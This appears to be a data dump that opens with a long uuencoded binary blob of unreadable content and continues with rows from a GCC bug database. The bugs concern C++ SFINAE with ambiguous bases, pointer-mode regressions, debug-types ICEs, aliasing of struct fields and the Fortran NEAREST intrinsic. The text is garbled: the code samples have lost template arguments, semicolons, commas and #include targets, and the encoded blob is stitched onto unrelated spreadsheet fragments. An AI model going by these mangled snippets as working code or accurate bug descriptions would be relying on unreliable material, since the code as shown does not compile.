MHP=6'KXI'@W5]5T]#J)ODPYE^R_$8&lt;&amp;CWK.0`D5OE\R`FK:SQ04==Y\!_
M.))Z#_\8*#+OS#(M2$8EK\QBG[)LZED=3R=X_.:DP@-KW$X4KM5L5KT.15
MD`[&gt;5.^:W?Y&gt;5`]R!@R/`8L%_#7TTCA\DJQPOKNMYHB`E0&gt;E*%R*CQU-S3
M&gt;*QH5@S-(FVH?S(9O[*IK_NUA_?BL0SOA7]XYA6HH#`.^Y6P$`'7^F*ZQ%
M:(W`C3@C8-F^/7U
MN[1N_TAGO$P0*/KF'XM?)&gt;.D+K@?1&lt;S8'!D02^+5/CF@\NBB[S@0F5N7A-
M7YZ=$8DJ=P5`?)5HHYQ`QB#V4MIA@
M_-$!J37EI2P`^U+TJBE)I&gt;=+*_4&lt;([/ER!0S2\`.AUI8U\N(ICZH1&amp;2E5!6
M.GD]VQZZA7N0NZ5AFW[!@6$P9=&gt;#'TYO^U[I+!%TG9*22O\8#K96]N79Y/D
M&gt;2YGN/CV'!-BZ.W]10^+*!X1H4U*!YP^^YB@&lt;Q:
MJ)@P^=^^-)^BZ!9&lt;D??8$ISX?+8:9I#I=?.LW[GZ6&lt;QEI/=CL6:YQOO/W9-
MTL!C!)H%Z\_[X6J[:M.K[%\31YMKA!IHSZ-'1I$S/\UZO*K@.QN[HOLT.
MW`5UJ4']+^9SXU?_J:.*0A8_A?O-O.O1?DY*6?XF0BZSR&amp;9M+&amp;@):#C9'77
MURN!IZW-+_3!=%0#]:(.?O?Q'=0%VAC7&lt;$
M)N8892Q[*FM1#N&gt;?Z'VU[G()&lt;D`!HWF5*A@NQ3ELQI
MKXC'BA+JUI^KR3!ETH?^?HXQ\)HU1^L-0__M2XI.!L+6AHXQM(#R[^JK^^H
M*GSKS(U`E\H^[UO6\2#`L^J^[WJQ8(:&amp;/*K(_
MW#4_8]QC#)/_13DU_/!6\_DWRY(D5ST&lt;**-W)LZQ)X*-5#&lt;S7S23K9*%^#
M66&lt;\NI_V5D5/!$S_@MJ8S1(KY*F0':/?''^#(\9&lt;=6ZWFV:-FG)1^A
M=?'0)]31:AG*[%+I)UNTIJ`*TK\9C&gt;IV6?&gt;U)-JB(:0Q*D0[!5&amp;M/QZ=
MO#UY=WQZ\E8]761GI3!1&gt;2JICXK3X&amp;+@URVQ&amp;GR8I:2B=V-$ID82!OMG!0$
M2..V+\`]8TFM#I[4X$(6/XK]$`1)8:+PB*)8Z9!9G5@A1R+0HWG['
M3++Y8V1CZ+A&lt;01W@Q%AE7&lt;RL2!%Q3(%9P/!5Z1+D.JQK='&amp;_]0ZP#%@F&lt;J
M-B1_+SOHYR1_*YQG'O`EPD8&gt;E9
M(WY@ZT.R*!I648&lt;M/*E&amp;OS!WUQJ@BIJY/5MBU+@3-M*BJELG#`!?=^!B
MOYF3F5-1!BN85GQ8.WR6KVU:V&amp;!7N6PWB_%EK#B7@Q@R?(&lt;1B8:@JKX0&lt;D=
M2K!
MEXP$/J2RL&gt;[68N4B(&lt;66QGJYQL:QJMU^04R)^5O&lt;-IEE$7FV4+
M\0.0^)%UA6KR]&gt;O%EXZQ]V1-#M*]&gt;I4%=3&amp;_[KUZ]PC-!)9A8&amp;!-MP&lt;1
MT4`?G(V2]
MMNH41?&gt;@`&gt;$O@4X.Y/[2`EN'UU]1.=LQ%YEC.+5X%
MK8AK8O]K+_?2Y7OR#1KLBA3?J=EN]/Q0#XB=['ZH
M]A&lt;@K0M=O%4K[#/`TL)&amp;A86]6.V0WO$CSBP!#PI6$9DO_O\#/8BKBOZZ@.3
M`T8L881L7BO[==7@W=%5JV2DQ@YQ#`_)GPB*&amp;*E`PF[B=&amp;7
M803&lt;Q4HP/K(7\!0UYPU\CKHK@/J39E]NMIZDKJ_I^_
M_Q_%!&gt;3G?QFHO!AQR*TW&amp;\QJ+7#?+MT$X+^K1UZ1QUK^E7G%:L_X4
MKS6]/0`#7O$S47D5)&gt;%)]293$H8\2IG`LR1JM=23H^(&gt;
MZYYS8+R&amp;/C90[AP&gt;J`.GT#HMD%E#0=HRVKBWVZ@01S^(TDE8F-WZH`!+33)
MUN`N9WW&amp;Z
M)9)^$[U@S/8_DGQ6+/XXG:95%3CIBO/-!_&amp;`GJ[[7)27J+$]*=RA'T%2
M#GL+C*OX`X[21/&gt;J-I@\L&gt;Y1`*:1VN(8*GI=+6.[^HH:U!?N$P$NOI
M-1A)V5G'M*M!F3CM_W0$A?P]D]'M$//$'%J^E'@9A=S&lt;TFQ#*S[HG[
MH1EZS95VU^R@5TT$$)W:0WIS*#572]C`-FHS2QJ^)5+75H(CL)%7O&amp;ZC!
MB:5[11NCCJU38%):81\-YDY-Z&lt;N-G#PG_JAJ05+T)B=46J=KQJXUC)
MLX_?'3$32`Q%:H=NPG0*'GX)2AV2-)D+&gt;5/\8P'V9\78@C
MQ\V$8:M?.@R?-))A57`+#3.P-9DD&lt;-0@RA&lt;V2SBV3M-=@%QN
M$-J1&amp;3S-Z+'``G#F0\
MU$HQD+$7B-O#I7U:(.UVX=DWC88Z4A)+RWE#F6-XSQ4.!&gt;VRQ!R&gt;U-=]L
M&gt;^M'4*^%6*$C&lt;+A9#2+Z9D.3/DS%7T'K8RDRU]J-
M]P1DT=%!66@V:K%:!^:QMHX?)I=JVW&lt;8KE13+0IM$X\!JRLLL#=!5^1
M8WWJR+'PFV_P6+A/L4AD9W-`FPZ9)9%:ED6=3NMT
M=J8Q(XTQ^('4M65/+%:U[OR-#-&gt;%-SV*]JDA+TODRK@TDAY]#NE@C1K+:.
MUQ9&gt;7\\&lt;
M*2Z*3Y#4$NQOFF7/W:.G5$?TA&lt;#@Y$1!`R__DT=]`%[&amp;3HVL#@&lt;?XA1&lt;
M.)**%$&lt;2*T1DTNF.99*Y.B/S/5R9]=9U46\K$N&lt;]8K2ANPU`NB4C(\6*7/
MON+`UC-6B29&lt;^GKORE1QR58_AZ.96'CCTM3
M?$D80:*:I`PV25ZQ!]0UH?EE&amp;'6AR
M\ZA*:PV6:]EX4KKY^K4-99W&gt;:8K2WP2IL2:H68([/*1SJ0HV)7F8:AN
M2RX5H:.\Z&gt;&amp;EOZVEZ0T:3=LV8N1:^5V`%A[&amp;\9^FG*CH@K$D)=*U_#]]C(
M%0(*548_JY25H:.T:_%RQ[V&lt;=7`I%&amp;AG9!508G
M0&gt;)18G8ZO33%#Y40(&amp;MX:O#X%ZI&amp;^NNP/[%GMC#'V*&gt;I@G43WX1V&amp;=&lt;9J
MV7KB@9GVP^M+[ZQ4&gt;(&gt;LZ*Z_@SB0D].O[%!7B55-HWU
MF-#C=SOM%-E/6QRGJS)!!:WX!9IOH#!'S\\)L?BP4B2&amp;N:/Y%O\N2AG2*:P
M'&lt;1P4^]I!94.R7JWJ-([Q@VQ*E]5Z2R.!P/TVWB8YLKZ3?!8GLQE^
MNYR_G0S`D.=OT@7/2X-OL#'[TU6$1\%K*P]X9HN)IZJ6/2\[FD6B`4$72&amp;
M`@LPF%9__%J'OW'T?`_1I.73E?*2VPDSV:DZKBYZC2I!-3A?QPWU/[7
M%:+LZI=Z2QZ&gt;3%[*5^F'0Q1P1XMP6&lt;^%K2:IBLJ-4_:!TP[^.($P?#+K_
M&gt;&amp;D+1.N&amp;95)F'ORQR4`3UL0=Z`LK%8R[YY&amp;*^PB)!I.Y***.EC3HYV*
M)D&lt;.DW?'.Q:0TFHYEV=0?[Y-RI^
M[@)Q(@J&gt;^&amp;3L=_&lt;HG7/SFC@)#X$4ST]F:M5Q/+^0S=XDD'F.E?R^WC::
M2\GF8O*VEXFIE=SDWC9Z2FM+G-O&gt;YXJB[`OKCK8SDQPH%XF\G'_.
M*@X5UK@4?KQF`$I_.ACZT06L3#^E997JL/C/2T$YM5HC$K9G?MD.$Q
M&gt;K?SQ4Q&gt;\6+)P_Z1\IMJ7^7#ALZIUI.8XL4FLIC&amp;_T@^LQ&lt;69)A-+SCTP&lt;9
MGI5#.0\_S'F6*D5`+7%&amp;_JVXG]XS1!AL95.!1
M/[!`PP'&gt;*D!
M)-H&lt;`*S26J`(8*E`+J+#424C!=.-.:%HR)#)VL?0D*U9TF=:%MG98!E2J3%
M$OUDN?&lt;IFN(*6C@V@TL'2S)W[S[?K/'\!V)X.%1^1G4_-(WB!E&amp;.^O)
MXMOC2?-^NV_T%AH3X)AVF\R''8!&amp;T[
MX\A*.L'Y-]^-IM$SE*PD:VO#]8YT99EFU+*K4'#\88D]]$-?&lt;7O3W%-89
M1OC!@?+&gt;$F:=R36%06P9*2\
M'6QA&gt;L@++C0255X/4=(E-\B?'ST[H%$.=M&amp;Y3!=J/&gt;-YQQ'\U+Y:
MTU@R%C$3]_+U535KYFTV(U&gt;GZ/A&amp;P5I\1$.?^2FK+(H2/&lt;=!BPE'D=CM^
MF0*UPAYP&lt;TI(A0E`%9K$`'NLW!PU6)*FC2@C
MVXB#EO-5-3%Z5I0H@3J+X@_EOQ[&gt;&lt;^SZV!I``B5#^DXP1%`@P`_Q&amp;[.U
M4?Q!3)O*L@PY36]!Z
M?5/CX-:7HI_^8##X^7#T82!&gt;=B.S\Q*`!UUP*'I-AJA
MH&amp;FCSF6:\P!4*1V$+)1R'+OBHO`K_@U#F\5+41%01(RF98%F&amp;&lt;$T]MT
M^E%Y@`&lt;M!
MF9P#B@T8A78U\5\IH]E&lt;'%]5K6#R+U)'J!9A4?SON3)&amp;&lt;A\08!.I+PE
MGWE3#N8/#Q9`QBP5/21TY&gt;A6@XEYP^NFT3'NG612JXOV1!3(B'JG@ZAU*
M.CGQY'V&gt;VQ7L206&gt;4(:T(L1'\?T6@0G+L*%J2*W\?
M1S:E:X[X9'4)F&amp;\%7'0#-??AQ].J*G/R0'V/V`R[65IBHVV&amp;CUFX8ZSD
M#S+#\A?`0YDC%K3&amp;MI[:4Q0T2@C&gt;C(*!E+
M\\&lt;4U4+.]@P+?D]202CYOJ$@]QT:#1FK%N-`#@^8-3UHW$?4-P]'CPAZV6
M:8=)8\]2$1AZN@OL73#JJN4QI/1&lt;[ZHSH0LDJ_83MM^1S:S=.*AAN1:C:7L
M=T(X%AQ4%-WX!N&lt;TDU[(-H0N8&lt;FGC8&lt;RD&lt;'GNK:AVE4[42`DUTW#`RRI$I
MY8BY#4/N-Y7I&gt;XKG@YM-?$LLXB'@XE0&gt;BA\U%/=%1&gt;&gt;-27-NV:3BV0-K!
M!]/M@1L.54ZXQR1IE/%+:'96LQ=XW'8U#!N3:WI:I65+NRP4%D'V
M.K'5#NG4ZHSW4X0K-U+KP'W#2*T
M(U_9
M):F/@WO\&amp;6HA#`M&lt;XTO*3
MBE.)3U?*2=CP:*DN2Y`(`ON`M&gt;XU[F
MGNSI#O*H88^NN6_Z@Y])K0_*NG!-VW$.]&amp;AW:)J'&gt;&gt;U#J/^%P.&gt;71YL9''
M(:E?^E'/3&lt;04?8AVP6:8417`^P`PY:F2_+)9:&lt;K&lt;R7@R#[10!N`=9GP%!X
M8H+ZHP60WLW.ARZ&gt;XNQ'A!#T^KSE1WW4PIX9:!-`U0
M'&amp;ML*.3I(4=5WT@8MRF-+*N6H.(_BG_N2#5=$L5]5M?)5
M/T):A=2//&amp;F+/N&gt;%Y)1S5*T(U%'+8/`9J6M*-
MN'M6A(.W!6H$$&gt;I=47L@/5C]+'V*J*0W*NHU\C(S'C56#DWF&amp;RS9&lt;A&amp;W/DR
MMC&lt;BD0HH5'YMCQ.X6@=1RHTBD_H-
MG70T9:YD
MM1PWL'N`+:C0?N%T-03K6)&amp;EG9#-]\]5FY`BCAB*D=S`FAT!E[86NVL`P
MG&amp;0*GP2.PF+$
MJZ$_?-\/8^8F=G/$?Y[LGBI$@&lt;HX+L+N@J']2)O%`&amp;UIDV8:0DUI`D36[]A
MY'&amp;HZ@Y(AHXKT65U5F1^^YNYU6&lt;U:TT`
M9D9D=KO$1PZ:Y#20%N:+))L1('C\-I[F:#7)GQ9FP+:XG.DWS310S8)UQJJ=
M[^8M+((FDV#LWW:%$7]DT[4&gt;//)Q=WR:A0]BDX&gt;#SIDNI%/'^]T9&amp;[=WNEH
MU4GTZ_P-ALVA`QT:A#^0BYD:19.-0P2$`V`810M?
M0AOJ-ANF+GP:67T#IT38+M^5N/`XRM]19_]RZ&gt;&amp;C-H\_TGIS/T^E
MCO/LS$P2#MX=H)R0]M#`LXI_^OG6??(`Z`&gt;U+5:
MJ.$U36!DH.[F5YID4+^[H=\.^%$^&lt;L&lt;?[V$9XKB[A_W$X2]FI$OPLSRVT$SC
M_IF%[$6!`?&gt;AT&amp;A)T23/%IKU_S!0$*89M!+2-V7%#@&amp;#3
M:-7QO)&gt;+6Z-W7#R'%UI@/2M25($?A#+&lt;X@/$F+0$WH]049G(_%7`RNQ
M#+HF._'V.D]M1IF-2..:9+OL:Y!^+2&gt;1M1(TDK\)ZJ&amp;XNJ2=!Q-U$2BA%+\T
MQ!(.)D&amp;P`5L(1_4Y6?:A.CGG=^W%%7MVLYX8KR#&lt;53'`
M&gt;!D8=_4H?RB#&lt;_BU6&lt;_IOSW60L&lt;7O:QQ(D`@T^]
MR\*M1A)!QQRUH3RZ$1%&gt;&amp;N'U185F
M*-Z:XPSD8$+V#]Z##*]C3.W&lt;%)-^R.9W+[3!4&amp;3Y_X:/&lt;:`[+
M@$D$J'B7G5&amp;QL5UUVM&amp;`MYX\&gt;@X=BPMVH!O/_2-5RN`%K1LO&lt;)CRM!I[!2[
MIEMS12/_*Z`WYPL5R:[9(ASZ.D/?G\$L%!!X)=)P:Q!^3$OMB@U&amp;/N)(&gt;
MJY=-G%NU=:5*&lt;-?KD:&lt;KZ&lt;(AF882+9&lt;ASM:+*'.^-$=BWVL'-'9_VN2YR.
M9$P0IE=87W3.%GZ%N^=4[QLUV*_M5@F
M9&gt;H+J+:/8X?_^W43VT?&gt;Q3\$/&gt;&amp;F95H1D`&lt;:I?[7HM
M'1\J]86'P(/.J)&gt;)2G0^:0IA@?A[-W&gt;R/A1F0L
M4?.\RK$L9ZKMJ7*YF?4H$&gt;60VC3(@LFTV0@^&gt;GJ!8+HB&gt;00=&amp;7[VK_0JF
M&amp;1K*&amp;Z&lt;T^4P78PAOJ=&lt;@K(&amp;J]?:WYKS$U+.4M.X#\:A'USI9TC?0)`D)6
M4#DBKAB4X)0)7-KXM$O6/@)+WFY%00TTI]_D@Q$.AW6:E=LWL
M^F0^6&gt;+26E4]^@:ZGY^
MU3&lt;Q+_H0(JO+\E@!'85\+&lt;(S7DO=1=C-\K9+L88*D&lt;+[S`78PP39%3:#
MVQSAB\?PI89?K&gt;&gt;W!V.
MDTC?I.U&gt;D#SKU\M)Q[N?VYO7PXSMWAZ!Z`5[O@.M&gt;OZ06G6G
M`]R&amp;7=0@&gt;7=A-%P^8@:^W'\7CXD`^]T@#X&amp;WI(`W@(#BWC(=M&amp;0ZI#7&amp;2B=
M0-(K\[9TZM#-$#9ILMQN=Q3)_.RWU`=7QLP^3\:I0G6^EH6$70L[/^PW5
MR8'IF*GZ\%IDZ.[2:M%^!/DSZR]W?%#E[V=
MO.&gt;9S&amp;^*JMO%_*YQ].CW?9ZO(N1SDF?.-TW&amp;.AXMP/=S1NM&lt;WFU``SU^-L&lt;
MZBK/\JS.DGGV[Q2\2GMZ\FT.%PO7J]4UW.@N-=&lt;J_L&lt;#?#NTV3Y0[E
MD.SPV'BZ$_UG//_]CR2?%8L_3O$C1OQJYY`]EQG_%U*T23Y-1&gt;TZ5
M).W#??6M$2J$/6U*PX1?XMYNGW^2R]'DI3\MZ4NKJY2]M0JJX0U`
MCI_=[0-(Y$6?Z'4TQL&gt;1GV_Q&amp;Z[*YTL`'[]%ML\SC=`4-P0D=NCP7MFYK5I-
M@!O@1W]M$.AA*.SX0GSDWYKQQZ^U&gt;WIF.)+WCN85?6M7#&amp;Y]'YA^`33EXGL
MU5DJ%][]/IGA??Z+N`GD?V%5\7/]&gt;+6)*.?*2/-\$J1\8E4@2]OR]C@:#
M03BU5(J$KMW['BD#?=[6[OC%&amp;4'OMS&gt;@\YPZG%
M@V[X#V+O]-_FMY8U#QCC%D%7&gt;#$7_.):WP$]:T4`4&gt;!]JQ01%!]\HW*(
M4=@R]P\LH=2IMS1_0!$VY`RY/L&amp;W(-H@WI:5T^M$6CGGXZ&amp;DEI!-R&gt;Q?JZKN
M2CJIY@VFD!`H%Q#F1*M5I6BO./LSDDDS5'$&lt;[2NX4`36#V.8M&lt;9U((
MAZVK\@!4QM83_*B!HEI8AIK)3X&gt;'DW8R#G9J%W2@!J]@$D%#\(]HJ%'KT_
MH32Y4$D1B*R-(THXVH&lt;$[MH42QHJ&lt;8HZS!Y#\M#7XW!6:
MU[I:%J*7KH-]7@^3G/5-.%]=DZ8X/E(DKR-Z2BBV@!RBJ&lt;&lt;$Q!2/4C9D85
MG)B3E+][`3K&amp;+D_7-:C0*ZQ*XI'9U0KLVEJJ:XUCFD@@76JV\F[U$4!9O(#
M*&gt;K40W5Q!913WKJ)WHJ$VL67-&gt;'82CTR+&gt;788.]-PYK9FLM=NU
M(4WHDD?AJM)Q[2]USF$
M&lt;1E1P6KNF:0LAD/6B*KL'HS6&amp;]Q&lt;3C-(M#A'`UV-BGS#MAC/K&lt;='M6N(
MS!!H9+L+B8MP=A.&lt;=4ZR%A12\0U6_W:_I(0Z?FT9ES`'&amp;_?]3)Z9U+`K_)
MM_:J:+!&gt;(PZOW/6N7ZJK*^@F*
M)3(U:+)'AZER&gt;+B194$X*I1FV^&gt;H#&lt;B@FAWNP@!D3$#-%HKZ&amp;0=
M&gt;(%89.Q/2WSBLTAG62(&gt;1J-ER5M&lt;Z7]GH90MI'P7(XE9-=\-0B[8H4B1SZ
M(MSVB@JX=%ZE2F.SYE36U#\E^)+A+/6E76E-?JZ7C&gt;6^?`*6(E?7MKSLE:
M[+_^K!&amp;G!DWNB^9NH+L[(*87@%S$%9&amp;K282ANDILI7ULK&gt;B35G5B11%Q/\
MUU4^Q4_F7/$GSA?YPFTUOPRI[MA3TIST1+5*N3Z&lt;2C0EA$_6@BA-P+@%-
MHH#K@&amp;9(7'=YYM\8GH(.EQ3.H00`@@&gt;$2:PBZ(##W_^P^4_9%Z=U:T9'0F
MUJ*0^AH=\%'XS%PZL)\!F+!JI!*$E]T$D^9\2+7/9$
M-]@B1'_[*J]%(PI6LLB:!-)UNL(ZQE?&amp;.D:QV\+JC)%*`CA.&amp;0+L=P9^G64
M+L_.9MDU&gt;YB:I[^HRVR)I-**)7*ZBR'])&gt;7$=UYR%4LF^&amp;KC:CH\!`6*@&gt;E
M!D\$Z3-X)-KRI*T5)^S&amp;@M:@X8&amp;-$*8'CLXUZ(3#&amp;'&lt;`8=0#C.8I=?)
M:EZ?J1J+/@:!-1-E7(!%1'2[M@+KR:]%0W@A&amp;)_HR7!?$
M:'0:R_![29.CJN_!'(*Q_8VSSYYL\EX*G!_-H++!'0&amp;Z=SF2@)JF)
M^`V@M87:?Z6ODM!G4&gt;O*)G]*YFF&gt;1W38:?)`IJ::A%&gt;4HP(:&amp;GYWJBQ
MVK6AY.E=+9\&gt;%2$$?2Q)R#=A7+MMGU:T=@A`[$D:K.^7FXAMR]?][$.OE3
MEB?E%V@=#?WN&gt;5][QIIN4=+&gt;`.F&amp;%A^`%A12X:+[IA#/I?D)82?_Z8
M_9MY=2-BZ(1Z.'1]M$K5Z`=X\^YOC0DG/2A&lt;&lt;SW/=BW0^LQ`MGA%%::SOG
M?(6KNV8K_1%-FF:=A]#&lt;[M-H27!LOP4\'FGN/'HKIYO9)FL13N6@_YH&amp;^L
MRE\#1MS`U[89&amp;4^CO6WX\EL6#&amp;3#:8L/IT9&gt;%8]40&amp;D55FI1XFZL4@Q&amp;
MJA$T8LB/7.'%L!\.8SPTRCDR%=-JY1K[\*BLCBL69S
MT68L5DC6KT09[CTY7/%JA0'FRA'R[08O1&gt;J]+DGMY80%
ML(VDZ3&gt;F/+P&lt;3?1VF$^FJY*%GH!1Z4[YD5P0(QF$PFD7A+1&lt;.P)#9N2E#(I
MCQGE_A&amp;WBT8-Y
MB)V184SXOMUQ(IEW_58)(T+AL24*1VB@)[ETKE$N-_MR@`)W1D2H1&amp;5-8^
MU(YPB5C6S?TCD6W--:`A$##V*+HJT^3CQ$&amp;*^ZT2^L'$KE?@:L-AS8=4]#X%
MV1OHW_J&gt;/GJMGCA#5PT5MW&amp;^N7&gt;+]T6B&lt;U:Y9?OVF/R&lt;'3E*Z5$83HEHDX4B
M(.&gt;KYJ+R'``P:\45ER!Y$]!OE27-@=(5W_85&gt;WZI#CO)Q'Z++3`V#P/!Q
MJG.2PH6`$:&gt;W\J4P!5)$C@5S^686%%HYC&gt;AUK+&gt;!D1#60B7V8EVW^94*FRY
M-%HL.UU!SI:*E?+X_F&amp;4[G5NFE&gt;S[G8QM&lt;NMMRI\-&amp;O/&amp;&amp;`F!K?EA0C`
MVQ%W3OF(C/GP9@+_W%A$`*MPWKOK-?1]CDI.6/M58=(M\&gt;Q-N@]IG3PJ
MKX-]BN$Q@]8J\)FA&gt;1%_[-N^ABENY7&gt;@S`MD1=!./P-_KVJ]Z'_Q
M$O@[R89+`V5E'?R695ZA82PV.X6'('M5[5G]&amp;5%5F.Q[ACVNM9Y\'JN:23
M0%!-
MGU_'PUEE0K:C:&gt;U*QZ^]1)LX10S7O@-UL4V@[&lt;&lt;3#$8J#*^P[VF/:&lt;8&lt;5\
MQN]Y*^5Y^KG#$ZWN9W%S*_)$96@&amp;C&lt;7]M7C_&lt;^^+&amp;BVR35/B/7I)N=0ZUOP
MYJGQTYCO!YAJUP%6FSD.TK_$V0$D+)]I\E3NIL%O43WPPB%C0\VH]UPAE_L
M.P1#]`=(K^A2=1SGCPL9!=KB8JI.@RM:LM7/I\V-&gt;GZ%0E4&amp;MFM0Z
M_T^:*Y&gt;H^CO-J8%`(**$(!'%2$8+O@5X8Z&amp;T7&gt;$EO6(`ZWLI$4+A-.6&gt;R&amp;
M4U8/)RT&amp;@B?905##:WIVK$?3(&amp;8SU*EAWFFM1?.I&amp;&lt;=EWC(\PTFJ7*D@:
M)R^LP5+2P^7*#\6=5UQ(VRA6N3:JB
M)NCTWKVL*7E_XC.[*977@$(XD(FURXJOR7A[S$FNE/EP/E.$.O%[0R3@
MX84S+:IWIVMEE`UWN2YS\_%QBS'3GGM`NYUKC(A[NAD^'=H.V.:_+J:-OK
M4@\L6XO@JD7-6FHFN!L=R^.E(3$!0=+0T+D!(F$#V#HEHEO)7[5:1Q%!(
MM]70\HK=]JB^]LZ0_%&gt;05L8E8LC7KFA'SW+KB5GB//F7-?DTH!S]*]I
MJ8T2+A4&gt;QIV@-&gt;1/*P]:-I&gt;=LU_WS&amp;=CO6_!!K1?&lt;CMM-9KQ:D\K7=.&amp;4$'
M&amp;VP0M(N%UJ2&amp;NUJY*4NGZO\GV-)4:^RR_#XRI&gt;6^`?O8E5D#U^Q6
MTW)G.#+RUO!M=VMO.%'DT](8Q(QLI&gt;.@B`6-9U?*MUNMNM']SH^U?
M=9\\7OT?+!W:FP-N.YJB]@I)[:S&lt;=&lt;2*BTAD[WABGA&lt;47=I(5H2V3[W.\H
M$41W$Q^QKOMYTHL[G='?*G):5*4D@F&lt;SI8B#''CY?$K+DV1407T8?MF
MG:XK6%'53-%7+4FV?N&lt;%N(KD'2I&lt;B$^6I)*)E`37(/C=%@\.`#\'Y+RS1*
M!UG-/-G)(DM:Q7-5H]K&amp;).AA'Y5EKN&amp;#1QM-&gt;.-:8W&gt;_1&lt;FW[9.V63@8MW9
MJPV=-SC[/GT&lt;2#'[V#OXU`92W9M2-\GW/:Q!9K(C^HYSWX9$`?UE-
MY]DL3?)_9/G-7^I`HE)-)6V8GQ\/$7BT_%MT1#UX6B6:ZE-Z14&lt;77:T8KN
M-!?1?T3BQ@#^&gt;0%_TLL.)D$6X:I5OJ:@[RN*VAD:T0O:F2RRV6R&gt;!EV1E7+
M%T=[[8I%ME/L7*D30(/.K@KRUR%-N*(]D0@YP5**)A-T'(E:$RAX&lt;F'?B
MS?XC\1M&gt;&gt;FTL8#RW:RMB4#-KZA6?9
MUDKY&gt;\6'($?MR*GM5@%@C=A$-E\IZ^@`EQKPKYWU]4?0:FHTLP(4]-:7GDW]
MZIY4._31X%@:]Z(6P\-C1T:C7$ON1?82_%Z_
M#L)06W7U5JF`+8^6RS@/EZ&lt;]K-7E^8I57`8ELGOS!XU(&lt;^E1TUNL_9AAL\
M!A3R8-!'(/C4=B`5R4_*VVEDQN\C2BZ9QP)V/4CN+6HL9CZ_%')K&gt;A
MSA#7^$R.`WTIH*$)J`UP1N/_L`%'`@OCCP.9D`U6S$BF)_('W@G-R)](4?&amp;5</t>
  </si>
  <si>
    <t>miod</t>
  </si>
  <si>
    <t>GCC-44907</t>
  </si>
  <si>
    <t>SFINAE vs ambiguous base (the real one )</t>
  </si>
  <si>
    <t>OK this time is for real. I have almost ready a library-only is_convertible which purely uses SFINAE and noticed that apparently we have a remaining issue with ambiguous bases not fixed by your recent patch. The testcase goes like this I already checked that ICC likes it:
// #include  
struct A { }
struct B
: A { }
struct C
: A { }
struct D
: B C { }
template struct enable_if { typedef T type }
template struct enable_if { }
template
  class mini_is_convertible
  {
    typedef char one
    typedef struct { char arr[2] } two
    template
      static void test_aux(To1)
    template
      // static decltype(test_aux(std::declval()) one())
      static typename
      enable_if(From1()) 1) &gt; 0) one&gt;::type
      test(int)
    template
      static two test(...)
    public:
      static const bool value = sizeof(test(0)) == 1
  } 
int main()
{
 mini_is_convertible::value // compiles with 4.6 (false)
 mini_is_convertible::value   // does not compile (ok with ICC (false)) 
}
I would suggest double-checking the C++0x version too using decltype and more correctly declval.</t>
  </si>
  <si>
    <t>GCC-18184</t>
  </si>
  <si>
    <t>[4.0 Regression] Tree optimizers ignore pointer modes</t>
  </si>
  <si>
    <t>Using pointers of non-default mode via __attribute__ ((mode)) 
produces incorrect code in many cases as the tree optimizers
treat an __attribute__ ((mode) qualified pointer type as 
equivalent to the corresponding non-qualified type.
(This is a regression over 3.4 introduced by the tree-ssa merge.)
As an example the follow code ICEs on s390x-ibm-linux
because the tree optimizers have removed the required type
conversion as 'useless':
struct test
typedef int * __attribute__ ((mode (SI))) test_ptr32
typedef struct test *test_ptr64
int
test (test_ptr32 *a test_ptr64 *b)
{
  return *a == *b
}
See the discussion at:
http://gcc.gnu.org/ml/gcc/2004-10/msg00775.html
for more details.</t>
  </si>
  <si>
    <t>uweigand</t>
  </si>
  <si>
    <t>GCC-79129</t>
  </si>
  <si>
    <t>[7 Regression] ICE with -fdebug-types-section starting with r240578</t>
  </si>
  <si>
    <t>struct B
{
  struct A { void foo (int  }
  A *foo ()
  ~B () { int a = 1 foo ()-&gt;foo (a) }
}
struct C { ~C () B c }
C::~C () {}
(reduced from libstdc++ ios_failure.cc) ICEs with -g -O2 -fdebug-types-section
and is not fixed by the PR78835 patch resolve_addr doesn't recreate any kind of die in that case but break_out_comdat_types seems to incorrectly move the B::A::foo DW_TAG_subprogram into the .debug_types unit where it can't be referenced from the main CU.</t>
  </si>
  <si>
    <t>GCC-24117</t>
  </si>
  <si>
    <t>[4.1 Regression] struct is not marked fully as call clobbered</t>
  </si>
  <si>
    <t>For
typedef struct  {
  int x
  int z
} Foo_t
char *xm
void bar(void)
void foo(void)
{
  Foo_t x
  x.x = 1
  x.z = 2
  xm = (char *)
  bar()
}
where we decompose the struct for aliasing the store to x.z is killed
which is wrong.
Testcase is reduced from fortranio_2.f90 test.  The fortran frontend
does such things for IO.  The fortranio_2.f90 failure get's triggered
by the array-aliasing patches as it's sturcture contains an array and
only with the patches we start decomposing the structure at all.</t>
  </si>
  <si>
    <t>GCC-18201</t>
  </si>
  <si>
    <t>Compiler suggests submitting a bug report after exiting while printing error message</t>
  </si>
  <si>
    <t>The following should compile with an error message but the compiler dies in the
middle of printing an error message
#include 
template 
std::basic_ostream(charT)</t>
  </si>
  <si>
    <t>ron</t>
  </si>
  <si>
    <t>GCC-15205</t>
  </si>
  <si>
    <t>NEAREST intrinsic returns wrong value in DOUBLE PRECISION</t>
  </si>
  <si>
    <t xml:space="preserve">
The NEAREST intrinsic for DOUBLE PRECISION kind type is returning the
wrong value.  Consider the following program:
  program test_nearest
  implicit none
  real(4) sr sx ss
  real(8) dr dx ds
  sx = 1.237e0_sp
  ss = 1.e0_sp
  sr = nearest(sxss)
  write(*1) 'nearest(' sx '' ss ') = ' sr
1 format(ae15.8ae15.8ae15.8)
  ss = -1.e0_sp
  sr = nearest(sxss)
  write(*1) 'nearest(' sx '' ss ') = ' sr
  dx = 1.237e0_dp
  ds = 1.e0_dp
  dr = nearest(dxds)
  write(*2) 'nearest(' dx '' ds ') = ' dr
2 format(ae23.16ae23.16ae23.16)
  ds = -1.e0_dp
  dr = nearest(dxds)
  write(*2) 'nearest(' dx '' ds ') = ' dr
end program test_nearest
Gfortran yields
kargl[328] ./nearest
nearest( 0.12369999E+01 1.00000000E+00) =  0.12370001E+01
nearest( 0.12369999E+01-1.00000000E+00) =  0.12369998E+01
nearest( 0.1237000000000000E+01 1.0000000000000000E+00) = -0.4303249471964870E-36
nearest( 0.1237000000000000E+01-1.0000000000000000E+00) = -0.4303249471964870E-36
NAG's compiler gives
nearest( 0.12370000E+01 0.10000000E+01) =  0.12370001E+01
nearest( 0.12370000E+01-0.10000000E+01) =  0.12369999E+01
nearest( 0.1237000000000000E+01 0.1000000000000000E+01) =  0.1237000000000000E+01
nearest( 0.1237000000000000E+01-0.1000000000000000E+01) =  0.1237000000000000E+01
Environment:
